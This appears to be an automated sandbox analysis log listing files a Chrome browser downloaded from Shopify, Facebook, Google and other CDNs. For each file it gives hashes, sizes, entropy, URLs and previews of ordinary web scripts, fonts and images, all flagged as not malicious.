                                                                    SHA-512:BBCEE14DBAA06E4A80F068A7DE395B119F480AA21EDBFDDE03DFD0EFFE4F3EC84BCB02F2373B13746182E0EFD27280AB54A33763F20ADA48101452D4DACDB3CA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://static-bundles.visme.co/static/js/player.20946f783add5b90258a.bundle.js
                                                                    Preview:!function(){try{var en="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},er=Error().stack;er&&(en._sentryDebugIds=en._sentryDebugIds||{},en._sentryDebugIds[er]="2c118927-916e-4307-8c02-5387b8c57edb",en._sentryDebugIdIdentifier="sentry-dbid-2c118927-916e-4307-8c02-5387b8c57edb")}catch(en){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"4.18.14@21e4e4841b"},function(){try{var en="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},er=Error().stack;er&&(en._sentryDebugIds=en._sentryDebugIds||{},en._sentryDebugIds[er]="2c118927-916e-4307-8c02-5387b8c57edb",en._sentryDebugIdIdentifier="sentry-dbid-2c118927-916e-4307-8c02-5387b8c57edb")}catch(en){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"4.18.14@
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (23901)
                                                                    Category:downloaded
                                                                    Size (bytes):79298
                                                                    Entropy (8bit):5.388733639054235
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:3AEEAD6ED6DE850B45AA956118CC6479
                                                                    SHA1:E8B838896B3FF89263D3F7181165A1CEFE96DD62
                                                                    SHA-256:D25363A8010319B7FBD367E0060415588FBA56D86E9A091DEC785A0049E7DB42
                                                                    SHA-512:F1839FCB34D58563F3D785E05D49F6441DDC728BF591C5147ED420E76CD50F69B3FA9BD7434119838DBC18158CC731DCC3A424EB51B83DD8BDD0FEAD81718254
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js
                                                                    Preview:var q="-";function Ee(e){let r=Ae(e),{conflictingClassGroups:a,conflictingClassGroupModifiers:t}=e;function l(i){let d=i.split(q);return d[0]===""&&d.length!==1&&d.shift(),te(d,r)||De(i)}function n(i,d){let c=a[i]||[];return d&&t[i]?[...c,...t[i]]:c}return{getClassGroupId:l,getConflictingClassGroupIds:n}}function te(e,r){if(e.length===0)return r.classGroupId;let a=e[0],t=r.nextPart.get(a),l=t?te(e.slice(1),t):void 0;if(l)return l;if(r.validators.length===0)return;let n=e.join(q);return r.validators.find(({validator:i})=>i(n))?.classGroupId}var Y=/^\[(.+)\]$/;function De(e){if(Y.test(e)){let r=Y.exec(e)[1],a=r?.substring(0,r.indexOf(":"));if(a)return"arbitrary.."+a}}function Ae(e){let{theme:r,prefix:a}=e,t={nextPart:new Map,validators:[]};return Be(Object.entries(e.classGroups),a).forEach(([n,i])=>{W(i,t,n,r)}),t}function W(e,r,a,t){e.forEach(l=>{if(typeof l=="string"){let n=l===""?r:ee(r,l);n.classGroupId=a;return}if(typeof l=="function"){if(ze(l)){W(l(t),r,a,t);return}r.validators.pus
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (4197)
                                                                    Category:downloaded
                                                                    Size (bytes):67204
                                                                    Entropy (8bit):5.366249591323379
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:065C6BA5AC2000FA2324F882A1DC98A6
                                                                    SHA1:2A50650659E56CF668EDFABE798B996113342810
                                                                    SHA-256:A9995FC41DDB7B640BA0C2B18B9C56E0AC3014CE6905B62201C2A694AC2640D7
                                                                    SHA-512:3A5E795F7DCD5FACB8210CC91C96F66730F3946752D43D4E9D1968F6111E0972134C93F97CDD051A7FD6A1D736F1E508DA76E4648C0B06D492B380D1FE2EC63E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://connect.facebook.net/signals/config/1904241839800487?v=2.9.151&r=stable&domain=www.shopify.com&hme=8ce74e881727851b4427183947937854816d72704925561b9de6420cd43214ee&ex_m=66%2C111%2C98%2C102%2C57%2C3%2C92%2C65%2C15%2C90%2C83%2C48%2C50%2C157%2C160%2C171%2C167%2C168%2C170%2C28%2C93%2C49%2C72%2C169%2C152%2C155%2C164%2C165%2C172%2C120%2C14%2C47%2C176%2C175%2C122%2C17%2C32%2C36%2C1%2C40%2C61%2C62%2C63%2C67%2C87%2C16%2C13%2C89%2C86%2C85%2C99%2C101%2C35%2C100%2C29%2C25%2C153%2C156%2C129%2C27%2C10%2C11%2C12%2C5%2C6%2C24%2C21%2C22%2C53%2C58%2C60%2C70%2C94%2C26%2C71%2C8%2C7%2C75%2C45%2C20%2C96%2C95%2C9%2C19%2C18%2C77%2C82%2C44%2C43%2C81%2C37%2C39%2C80%2C52%2C78%2C31%2C41%2C34%2C69%2C0%2C88%2C4%2C84%2C76%2C79%2C2%2C33%2C59%2C38%2C97%2C42%2C74%2C64%2C103%2C56%2C55%2C30%2C91%2C54%2C51%2C46%2C73%2C68%2C23%2C104
                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1572)
                                                                    Category:downloaded
                                                                    Size (bytes):44863
                                                                    Entropy (8bit):5.348174320512289
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6AAF74EA9EE0EA53CE9FE5D7245F49E4
                                                                    SHA1:2EE86466160BA595A49A170B619D1B8E54A757D1
                                                                    SHA-256:03A9481ADE6907E9D8BECF8200100F11A05D8E372DBF7613F67BE7BA6AF1541F
                                                                    SHA-512:10ED15DEAFB48C2387B528543D129E5CC0420511F3A06B5F34212ADBA033553E5D383993EB7295831F4B76E9A855D72CB69D366A0227971C1D06BF8CB578A4DA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:"https://fonts.googleapis.com/css?family=Open+Sans:300,400,400i,500,700,700i,800,800i"
                                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (620)
                                                                    Category:downloaded
                                                                    Size (bytes):621
                                                                    Entropy (8bit):5.219358110227562
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C05C9DF9C2861B0CBF5123AC318C8782
                                                                    SHA1:B7A2DB8266F187C0723B8875A75732D9E1AC8685
                                                                    SHA-256:5B6C6FD6346D33E22C84BA82DBFF63AF224823A48054FA006BCC5BBD8F6A4FB3
                                                                    SHA-512:F5711DA27644CFA0521ADBEA23F4E7307E4E515FEC0E34A2F8F2FD1953E710BBBD65CC07735DB97DEA03F7FDC7322239B19C94352C3E900DDF8B513E49D3C7E4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EFDWHHH7.js
                                                                    Preview:import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var e=r(s());var i=()=>{window.location.hash="",history.replaceState({},"",window?.location.pathname+window?.location.search)};function h({targetHash:o}){let[n,a]=(0,e.useState)(!1);return(0,e.useEffect)(()=>{let t=()=>{window?.location?.hash===o?a(!0):a(!1)};return t(),window?.addEventListener?.("popstate",t),()=>window?.removeEventListener?.("popstate",t)},[o]),{targetMatched:n}}export{i as a,h as b};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (517)
                                                                    Category:downloaded
                                                                    Size (bytes):518
                                                                    Entropy (8bit):5.272652500142448
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8E962886AA631360E30EBFD1034B0804
                                                                    SHA1:404C0D9FA096CCFB9742B62DB55134AE3F199043
                                                                    SHA-256:3DA9995D6A39A3E92D47E418298BABE683403B7E1EE677FA40E82E072118BD19
                                                                    SHA-512:2969146F82C2CE32A62829B79CEA0E005C33FE950FB7F3F5EEFE36C17505C1C21AE10DAD93293C1DF5E964C868D3A29C78331865CB6188E5BE4DE908B2DDC068
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PT2PVC5H.js
                                                                    Preview:import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=r(d()),l=t=>{(0,o.useEffect)(()=>{let s=e=>{let n=document.querySelectorAll("[data-click-outside='dismiss']"),i=!1;n.forEach(c=>{(c.contains(e.target)||c===e.target)&&(i=!0)}),i||t(e)};return document.addEventListener("click",s),()=>{document.removeEventListener("click",s)}},[t])};export{l as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                    Category:dropped
                                                                    Size (bytes):357
                                                                    Entropy (8bit):7.158296653822419
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E98B4D08A0213AE5A32BB0513B1CE580
                                                                    SHA1:739EFAB35B893DB8B8F1EAC071371DFD332076B7
                                                                    SHA-256:AD89B683AC941567B8871C221D7E3A39A1200E70830DCA5CD3DC004FDAB4C8E9
                                                                    SHA-512:D35656A5D9E4449F251CF654C23D5223F5D51FB4E66EBE98AA2636E60C3AE737EF90FA252BD1FD4FFFC5887C023B8F4E69FB3002EF754E1F328E25171E143F10
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.PNG........IHDR... ... .....D......<PLTE1CQ...1CQ................................r~.er}XfrK[gJZf>O\........tRNS.....cw....IDATx..... ...[L ./3.....u...=.X.`c........9|..}.....@..G=.E.Fj..L$*V.~....B...K......Hw~.U*@U2.m.8.....z.4@.z.S....<..l...QZM.Y.;-ag...K.......V.....K.X2.@q.)...{.nCf..Sl.%......T....^. .m.0:...................IEND.B`.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2382)
                                                                    Category:downloaded
                                                                    Size (bytes):2383
                                                                    Entropy (8bit):4.50188224193924
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AF511218FFEF6602FB2E05501D488CB1
                                                                    SHA1:C403A4AD0BF1DEDE517C0FA8030316D3D651A65E
                                                                    SHA-256:5FEEB847B250E6272E04EA5C7C5582BD75E124614E4608B4D5EC5A0C05180951
                                                                    SHA-512:4A32FB34ABD1761B5861BAC048AF168046663B3DA86D8CEA7E03EF89C3EB373FD1FB83D14ECAE26826F4284148FD1A34C8C1089640F6AFF250AE776422D2D2EF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HOIARNIC.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var C=t(o()),e=r=>(0,C.jsxs)("svg",{viewBox:"0 0 11 13",...r,children:[(0,C.jsx)("path",{d:"M7.58113 2.2383C7.58113 2.2383 7.44812 2.27624 7.2296 2.34264C7.1916 2.21933 7.1346 2.07706 7.05859 1.92529C6.81157 1.45103 6.44105 1.19493 6.00402 1.19493C5.97551 1.19493 5.94701 1.19493 5.90901 1.20442C5.89951 1.18545 5.88051 1.17596 5.87101 1.15699C5.68099 0.948317 5.43398 0.853465 5.13946 0.862951C4.56942 0.881921 3.99938 1.28978 3.54334 2.02014C3.22032 2.53234 2.9733 3.17734 2.9068 3.68005C2.25125 3.87924 1.79522 4.02152 1.78572 4.03101C1.4532 4.13534 1.4437 4.14483 1.4057 4.45784C1.34869 4.69497 0.484131 11.382 0.484131 11.382L7.66663 12.6246V2.21933C7.62863 2.22882 7.60013 2.22882 7.58113 2.2383ZM5.91851 2.7505C5.53848 2.86433 5.12045 2.99712 4.71193 3.12043C4.82593 2.67462 5.05
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1569)
                                                                    Category:downloaded
                                                                    Size (bytes):1626
                                                                    Entropy (8bit):5.220738723616218
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B054C83B317AEF5D4F9F85A0CEB5CE27
                                                                    SHA1:DD06FF57A67CD39DBB80028AF9BA91E726B80FDF
                                                                    SHA-256:E236533B956DCD0D621C6ACDA7E89B01980F8A4BFD4E48B235C30CE5DAED7090
                                                                    SHA-512:9971DB41B8948CDB13E058E518D33E1C714C29C7FC203E78761C30F630F671E1B3B7BD0C2CB218CC6C32E245990FAFA8B96A988DA8C06F9C20A5C2C58B333C2B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/6.2.0/workbox-range-requests.prod.js
                                                                    Preview:this.workbox=this.workbox||{},this.workbox.rangeRequests=function(t,e,n){"use strict";try{self["workbox:range-requests:6.2.0"]&&_()}catch(t){}async function r(t,n){try{if(206===n.status)return n;const r=t.headers.get("range");if(!r)throw new e.WorkboxError("no-range-header");const s=function(t){const n=t.trim().toLowerCase();if(!n.startsWith("bytes="))throw new e.WorkboxError("unit-must-be-bytes",{normalizedRangeHeader:n});if(n.includes(","))throw new e.WorkboxError("single-range-only",{normalizedRangeHeader:n});const r=/(\d*)-(\d*)/.exec(n);if(!r||!r[1]&&!r[2])throw new e.WorkboxError("invalid-range-values",{normalizedRangeHeader:n});return{start:""===r[1]?void 0:Number(r[1]),end:""===r[2]?void 0:Number(r[2])}}(r),a=await n.blob(),o=function(t,n,r){const s=t.size;if(r&&r>s||n&&n<0)throw new e.WorkboxError("range-not-satisfiable",{size:s,end:r,start:n});let a,o;return void 0!==n&&void 0!==r?(a=n,o=r+1):void 0!==n&&void 0===r?(a=n,o=s):void 0!==r&&void 0===n&&(a=s-r,o=s),{start:a,end:o}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):4499
                                                                    Entropy (8bit):4.482106461831129
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:80F475DDD49655A5FBBB3CA479C78213
                                                                    SHA1:349115A905BB0CDC6A8A421092F767DA02C6D60E
                                                                    SHA-256:A6B2C4063BE7C26255CF82022079BF9A46E237D84DD6A31554E997176FC1C3C0
                                                                    SHA-512:16C7DDA5DF4F4A28D80C09CAC988A56C8A918B1B94FD8EE891E084D9C1CB9B10FC1C2200D83FED625FCD39FDAE21F8650C633BAE0AA01C752B80AB01A8261FE9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/80f475ddd49655a5fbbb3ca479c78213.svgz
                                                                    Preview:<svg width="252" height="65" viewBox="0 0 252 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="250" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7136)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M134.74 23.7067H137.947V40.3H133.86L129.107 32.6667C128.293 31.3333 127.6 29.9133 127.6 29.9133H127.553V40.3H124.333V23.7067H128.107L133.74 32.7467C134.116 33.3417 134.44 33.9685 134.707 34.62V23.7067H134.74ZM153.18 30.5H147.593V23.7H143.52V40.2933H147.593V33.2133H153.18V40.2933H157.273V23.7H153.18V30.5ZM93.5467 33.08H98.84V30.5867H93.5467V26.2667H100.633V23.7067H89.46V40.3H100.753V37.5333H93.5467V33.0867V33.08ZM78.84 27.48C78.7455 27.3697 78.6855 27.2339 78.6677 27.0897C78.6498 26.9455 78.6748 26.7993 78.7395 26.6691C78.8041 26.5391 78.9057 26.4309 79.0315 26.3581C79.1573 26.2854 79.3017 26.2513 79.4467 26.26H85.52V23.7067H78.3333C77.4109 23.6773 76.5135 24.0093 75.8323 24.632C75.1512 25.2546 74.7401 26.1187 74.6867 27.04C74.6867 28.0133
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (3033)
                                                                    Category:downloaded
                                                                    Size (bytes):3034
                                                                    Entropy (8bit):5.016554305285202
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:0D00F7AE67486A2DC88B0CF749FD22C0
                                                                    SHA1:0EF11FF73DDEEC4DE6C510EA43E3F18612F8A7E4
                                                                    SHA-256:ACF20B5CEE4B4E33A8554D4936855A923321CF646D5A9AE3A77F2F863DCB7A5C
                                                                    SHA-512:C6B0392159383E27365E0BD87B258B90AB11E99792E8985F8F650579508EFB7B776BDAB7EF3E0BF5D53EBBC9849B42B6D4C8C22B195887AA47435B88712CBF89
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5MDR4ZDZ.js
                                                                    Preview:var e={agave:"bg-agave-30",aloe:"bg-aloe-10",black:"bg-black text-white",kale:"bg-kale-90 text-white fill-white",lavender:"bg-lavender-10",lime:"bg-lime-10",pos_dark:"bg-shade-90 text-shade-20 fill-shade-20 default:[&_h1]:text-white default:[&_h2]:text-white default:[&_h3]:text-white border-opacity-[15%]",pos_light:"bg-white text-shade-70 fill-shade-70 default:[&_h1]:text-shade-90 default:[&_h2]:text-shade-90 default:[&_h3]:text-shade-90 border-opacity-[15%]",pos_warm_gray:"bg-pos-warm-gray text-shade-70 fill-shade-70 default:[&_h1]:text-shade-90 default:[&_h2]:text-shade-90 default:[&_h3]:text-shade-90 border-opacity-[15%]",shopify_green:"bg-shopify-green-10",shopify_green_gradient:"bg-gradient-radial-to-br from-agave-30 to-jalape\xF1o-30",warm_gray:"bg-[#FAF9F8]",white:"bg-white"},t={agave:"bg-gradient-to-br from-agave-30 to-aloe-30",aloe:"bg-gradient-to-br from-lavender-10 to-aloe-30",black:"bg-black text-white fill-white",dark:"bg-black text-white fill-white",kale:"bg-kale-90 text-
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (448)
                                                                    Category:downloaded
                                                                    Size (bytes):449
                                                                    Entropy (8bit):5.2124304796661
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7B1DBBCD4324B47D499D103FAF44EA24
                                                                    SHA1:A3AE9A3BC389E3FE9650087636657FD4804D4DBB
                                                                    SHA-256:0DD52F045FF9EBED132D7D489C57A7521273842EB6C4055E71FACAE0F06D3FCA
                                                                    SHA-512:F9A1F131D928046C76E0CF233120013A61A5A933DC16197FE3C011BE7452618B2B8E4E7162849B613887143DCBED9C2679749A242EC994846D8AC27BCA14282A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5FZGJS6G.js
                                                                    Preview:import{a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var n=o(a());function c({children:s,className:t,isActive:e=!1,hasAnimation:r=!1,tag:i="div",toggleId:l,...p}){return(0,n.jsx)(i,{"aria-hidden":!e,className:t,id:l,...p,...r?{}:{style:{display:e?"block":"none"}},children:s})}export{c as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (951)
                                                                    Category:downloaded
                                                                    Size (bytes):952
                                                                    Entropy (8bit):5.288476401607652
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6335C2A8EF56D943C79DD3C78C96B798
                                                                    SHA1:CCE4AD5CF9F9A49C17EB5B49B6C372D669F90F06
                                                                    SHA-256:DABAEB3A921E4A8094C858140C4195E9670C7659C202C84689AB4B0E3AC62BBB
                                                                    SHA-512:A541FC74739E74F4EC38A73FBFDE0D9727FBCB25AA2414529D4A9815090554F3DADA8F4E8F6B38D7E7097E186A0F85D8E505E720B216110B638725985A7830C1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-DFKXNKV3.js
                                                                    Preview:import{a as s,b as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-5LSG7SHH.js";import{b as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var a=t(m());function p({children:o,componentName:l,className:e}){return(0,a.jsx)(c,{"data-component-name":l,className:r("gap-y-xl",e),children:o})}var C=o=>({xs:4,sm:o?6:8,md:o?5:6});p.Col1=function({children:l,className:e,withGutter:n=!1}){return(0,a.jsx)(s,{className:r("flex flex-col gap-y-xl",e),start:1,span:C(n),children:l})};p.Col2=function({children:l,className:e,withGutter:n=!0}){return(0,a.jsx)(s,{className:r("flex flex-col gap-y-xl",e),start:{xs:1,sm:1,md:n?8:7},span:C(n),children:l})};export{p as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (9552)
                                                                    Category:downloaded
                                                                    Size (bytes):13279
                                                                    Entropy (8bit):5.324659625377195
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:26C11EB74C0D5A88FB214170656EDE83
                                                                    SHA1:BB1D5AD67672A663D93F533609C555EC1CA6C584
                                                                    SHA-256:51C7B5F5A8958386B995A1C324F7D3754CC6E604AF27676F35B49CD6FB710950
                                                                    SHA-512:BB18739C6E2AD6E58F73ED80F26DB80423E135E706A305D8BB66F5FDB1BA5DAB4F000388CD718469225A58269951107A771FECD24218A5122723F44BF1CA5419
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/6-bb46c076ab8a68fddf8952227c9acda6.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[6],{1299:./*!***************************************************!*\. !*** ../player/components/media/video/Video.scss ***!. \***************************************************/./*! no static exports found */./*! exports used: hideCursor, hideVideo, video */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(e,t,c){e.exports={video:"_1l-KU",hideCursor:"_3OgU3",hideVideo:"_3-9KU"}},907:./*!********************************************************!*\. !*** ../player/components/utils/customHooks/useMux.ts ***!. \********************************************************/./*! exports provided: getExperimentName, default */./*! exports used: default */function(e,t,c){"use strict";var b=c(/*! react */366),s=c(/*! react-redux */370),l=c(/*! ../../utils/customHooks/useStoreSelector */368),n=c(/*! mux-embed */1300),j=c.n(n),n=c(/*! hls.js */906),f=c.n(n);t.a=function(t,c){var n=Object(l.a)("visitorId"),r=Object(l.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (5955)
                                                                    Category:downloaded
                                                                    Size (bytes):253685
                                                                    Entropy (8bit):5.575186462314706
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:53FE44EAE3F854412CE0BD4134BEA140
                                                                    SHA1:99F131BD25C3698A8CF8E86C0EA290AB31BBF035
                                                                    SHA-256:7264D0E0C0479768DA13AC9952B15B8510AA11DDF72D6F27CB1916C8440B1088
                                                                    SHA-512:72C37B8E3562832A7D28720B03E8DA347E3589B226EEC8424F45C636855C6A454FD34B95B20D4DD2DC735E8309BC4B18C8E94393ED4616BE6D5D88C66FF22A6B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-KFBF07S3K9
                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":2,"function":"__c","vtp_value":2},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":17,"tag_id":19},{"function":"__ogt_ga_send","priority":7,"vtp_value":true,"tag_id":16},{"function":"__ogt_session_timeout","priority":7,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":18},{"function":"__ogt_1p_data_v2","priority":7,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTO
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):301
                                                                    Entropy (8bit):5.257391961313109
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E2377C452E4293954116F956A1A5FCFD
                                                                    SHA1:9B88A9E2792BFB289A1E75EE6D324D00AEAFBD69
                                                                    SHA-256:13030A833AC9A757BA6C1CE905C3CF895F157FDA76D3BA8EAE2FB6F8A7839F44
                                                                    SHA-512:73A90745611F8782C8A05A34F9C377DC2388890A56882FD669A8E7F9FE9CB350BD0FC9330936BD3FEA0C36CBB7167D7D3EF8AEDA5AE2586ABAE0B663C44C998F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-E3EEA6W3.js
                                                                    Preview:import{T as n,W as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";function s(r=!1){let{site:a}=n(),{pricingSite:o}=i(),e=r&&o?o:a,t=e.languageCode||e.locale?.split("-")[0]||"en";return t.endsWith(e.countryCode)?t:`${t}-${e.countryCode}`}export{s as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):4120
                                                                    Entropy (8bit):4.715090601935878
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:671C798183EAB1529BBC4ABB287FA2B3
                                                                    SHA1:91F596B493D489C22DA608729E8CB6BEF84CFC88
                                                                    SHA-256:90381E36F6FA4C53524949E7C77C7164905ADBD0360130F49962F2A17521CCA9
                                                                    SHA-512:318FE033BD32F5FEB35E6250EE651CE111BFF0AE251BCEB1234267A5A05B7AA4BD02DF24C47FC82D2FAAFBE0274FEB85784E0D9260772D0266326EC987AA9CF7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/671c798183eab1529bbc4abb287fa2b3.svgz
